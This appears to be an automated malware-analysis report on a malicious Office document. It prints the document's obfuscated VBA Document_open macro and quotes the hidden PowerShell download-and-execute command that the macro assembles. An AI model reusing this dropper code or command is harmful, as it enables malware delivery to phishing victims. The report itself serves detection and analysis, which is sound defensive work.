MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This macro constructs and executes a PowerShell command: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('the embedded link')". This command is designed to download and execute a script from the specified URL, indicating a downloader or droppper functionality. The presence of VBA macros and the execution of an external script strongly suggest a malicious document, likely delivered via spearphishing.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43715 bytes |
SHA-256: 8659ebbebebe13029c6c914a14c80b9f3ead77a2605efd83595b2e0498f5923e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ipisiiaFQG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
KKdXp = (41704 - JCnXsT) + 81342 + 84908 * 55489 * ljTLC
IJNmM = (46435 - vpnYT) + 3973 + 16170 * 79486 * tndfXs
rkGhWmPMdcp = Application.Run("oUzNlVT", "" + czkOMAwYRhCz + CnoKjoHzdKAAPD + UjsiSUa + dDwPDwz + XEAsFJ + hVmzubRbI + LqXvbEiJ + ZSUasujYO + rVwzPOla + LsdqMiTAJ + IFEXiYaJ + HqQSCwBIc + ujlIoFiXLaw + vuKDs + zYIzSmN + kQwipmMRJDW + cnQMtowhkR + fOFfP + dTZNMkuHDZs + lihtUwPnzV)
Gbalq = (31148 - mKjEhh) + 56412 + 4542 * 57586 * wiwsV
End Sub
Attribute VB_Name = "wiXULpfwEqFJUW"
Function UjsiSUa()
On Error Resume Next
tlzkkO = 96261 + jjFPH / (94809 / UwDSV / TdKRK + qwfzlD + (65179 + hUdLz - (26211 + RZIpZ * JzICrw + aHmSZn)))
VpTDOG = (zmJWWG * aTYQpA * oFolJz / hnQlYW + (84975 - VQkGv - 42430 + HSRNvO / XzINF - kfREGJ))
OqJwLUuwUq = "" + jTLZjnA + SIACDCblnjBXw + "PoWe" + zoZhKmMF + ppdzEVzpK + "rSh"
UjsiSUa = "" + iXEkrnzaIdmYE + OSIGGCulOMwmjL + OqJwLUuwUq
BPPFvA = kKisV + HtXzzK * 92372 / NaDYA
mWUQQV = TwNfwn + QZYJH * 59887 / DSlnmq
End Function
Function dDwPDwz()
On Error Resume Next
LjvRwB = BMvOKv + FFIik * 99383 / oOImfU
cdfZaz = PrsCOp + iOJrw * 47778 / qpfbT
AzHJHD = wlPnj + COclcG * 69610 / WtjntX
cEvdAGZzJp = "" + ThuNMwHBoEu + SwTSmAfBCN + "eL" + dDYVOjt + wGlPpQV + "L " + CpazbmUbkRHdQ + IiujfZXBzRWph + Chr(34) + "[S" + kKQNLNdiclBmwb + fmtGGVlFOin + "tRI" + FwnYnhzNDIff + zinbawpqC + "NG" + qOYLwjZCvXoNOI + OciObCD + "]::"
bDNctO = zczTZB + bGcJu * 18433 / ZShua
GXzJOjEmc = "" + UnKkkWdLaC + NlLaiNWCIwtJiK + "joIN" + jhSzVaIJIpQi + CGlPCnGGQMrVRV + "(''," + FaUsfsj + ncCRpwoENv + "((" + PHOdZRFIAI + HjqOGPKWc + " 3" + LEobQDQDa + qSFOFbiAYfp + "6 , " + FGawwlPv + DZkppFjEMGisY + "83 " + JjsbRjVQiVJcS + shRZCoUlovpad + ", 1" + MiRGpCXTHJh + UfcQzXOz + "10,1" + GCozDjcJriwIaL + nUNJPUfNR + "17, " + YaGTiljKE + UniApbI + "61" + QFjjujR + XajuNDilPPWr + " ,1"
REMtpN = zTBuI + THTVbq * 20857 / rOqPCq
PiAai = iDFED + TrWZz * 38417 / YjZYZ
hDQbFoBuaN = "" + KaADwarLPqmWX + qhjQMDwiPqZ + "10"
rlNYk = hdTAz + iLiwLi * 69330 / kirbGw
imWmW = qTIiVh + KMAXOT * 86730 / YVJMO
ToWUhijDM = "" + MaHqccWVw + cihXOZOz + ", " + wditdIulSn + MGZrECjLdOl + "10"
BBTNh = LOuOzd + wTcjiK * 95352 / WazWUL
oFqnBzDppSD = "" + jsBbcHaYlEzOR + OGDQiujafRi + "1 " + qMWviBiFbV + BKtFzlEi + ",119"
dDwPDwz = "" + OIAzwARW + jFiZiBfQNXnljE + cEvdAGZzJp + qVffZtAizOvl + nELYfwcUXzG + GXzJOjEmc + zVdbwQPJvr + nEAbTGtNjj + hDQbFoBuaN + IYjGWzhZlY + UmzVnUsN + ToWUhijDM + srctDrM + OmDTXjInwJEm + oFqnBzDppSD
nGhGY = 50960 / rUtGf - (84756 - ctqNLo)
RTcoi = 63624 / DbOipp - (74523 - knzVW)
End Function
Function XEAsFJ()
On Error Resume Next
roiKE = 37798 / bZNNoO - (58424 - vhwRRr)
vvhRvWWk = "" + qXFaLSSHHGkAz + kknEcbzIGEEoY + ", 45" + UqmpUhORPHvFh + ivLJjjEwZNsOwW + " , " + tGOluOKBHVT + hWQBMVIcPUMQtM + "11" + TPvIdBwSVzU + BLNjzsrb + "1 " + AzBimCVAChZo + PTjXzfMAWT + ", "
wktTl = 935 / iuJcW - (23808 - AwREk)
dQiLGZOBLr = "" + QjMTihZzchRdD + jwYibiGq + "98, " + jfOjSizD + MGRVXFujuF + "10" + PriHMfiK + DIzCKQKzRatRu + "6 " + CKWkZwEcUQW + WUZAJWDJ + ",101" + udWuoITwwG + VHZltzjd + ",9"
PAdwBt = 14905 / YVipc - (13480 - BPUBS)
jMzRaY = 56775 / cuiFN - (42054 - rGZqY)
zcdrwC = "" + jiShrjMcUNV + zkTjuTskG + "9 , "
hkYNbb = 3305 / YiTmH - (81622 - VPROrs)
MKuGkDhSFzI = "" + WGGiOPuZIZAHLw + MIviizLtIwcSs + "116 " + fjirVUX + otiiqdKQ + ",32" + fjHRPZuNVQ + hdXVXjHfXoK + ",78" + lSdCinMCWzSYSP + HCiWMLBKUGd + " , "
zqYUXd = 11914 / KqcaZ - (20971 - FzFRqF)
ShzjiQnkuJ = "" + PhZRTiYKDRZ + DvlLKwLFwnAXFX + "101," + SfjEvEpD + cRSXHlVLtKfivU + "116" + TuZuNKYzkl + wwFhXMT + " , 4" + YfOCudpjokMdY + iujStUmWtRMvEz + "6, " + AhjvOKrTjiRv + aZNKDccBATl + "87,1" + khikihCLwp + UCQlLDrVNqmi + "01 ,"
iGwhPJ = (oHlwz
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.